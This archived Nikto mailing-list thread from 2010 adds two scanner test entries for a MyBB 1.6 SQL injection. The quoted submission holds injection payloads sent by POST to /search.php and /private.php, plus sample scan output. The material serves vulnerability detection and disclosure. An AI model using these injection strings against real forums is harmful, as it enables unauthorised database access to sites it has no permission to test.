[Nikto-discuss] [db_tests] new entry - myBB SQL Injection
Sullo
csullo at gmail.com
Thu Dec 23 22:11:21 CST 2010
Added these, thanks!
On Thu, Dec 23, 2010 at 1:34 PM, YGN Ethical Hacker Group <lists at yehg.net>wrote:
> udb_tests
> =========
>
> "400000","0","9","/search.php","POST","MyBB has experienced an internal SQL
> error and cannot continue.","","","Sorry, but no results were
> returned","","MyBB 1.6 <= SQL Injection, ref:
> http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection<http://yehg.net/lab/pr0js/advisories/%5Bmybb1.6%5D_sql_injection>
> ","action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1",""
>
> "400001","0","9","/private.php","POST","MyBB has experienced an internal
> SQL error and cannot continue.","","","Sorry, but no results were
> returned","","MyBBx 1.6 <= SQL Injection, ref:
> http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection<http://yehg.net/lab/pr0js/advisories/%5Bmybb1.6%5D_sql_injection>
> ","my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff",""
>
>
> Testing
> ========
>
>
> >perl nikto.pl -h http://attacker.in -root /mybb -useproxy
>
> + Target Port: 80
> + Proxy: localhost:8080
> + Start Time: 2010-12-25 02:28:34
> ---------------------------------------------------------------------------
> + Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a
> mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
> DAV/2
> + /search.php: MyBB 1.6 <= SQL Injection, ref:
> http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection<http://yehg.net/lab/pr0js/advisories/%5Bmybb1.6%5D_sql_injection>
> + 2 items checked: 0 error(s) and 1 item(s) reported on remote host
> + End Time: 2010-12-25 02:28:52 (18 seconds)
> ---------------------------------------------------------------------------
> + 1 host(s) tested
>
>
> ---------------------------------
> Best regards,
> YGN Ethical Hacker Group
> Yangon, Myanmar
> http://yehg.net
> Our Lab | http://yehg.net/lab
> Our Directory | http://yehg.net/hwd
>
> _______________________________________________
> Nikto-discuss mailing list
> Nikto-discuss at attrition.org
> https://attrition.org/mailman/listinfo/nikto-discuss
>
>
--
http://www.cirt.net | http://www.osvdb.org/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://attrition.org/pipermail/nikto-discuss/attachments/20101223/0eed2e9b/attachment.html>
More information about the Nikto-discuss
mailing list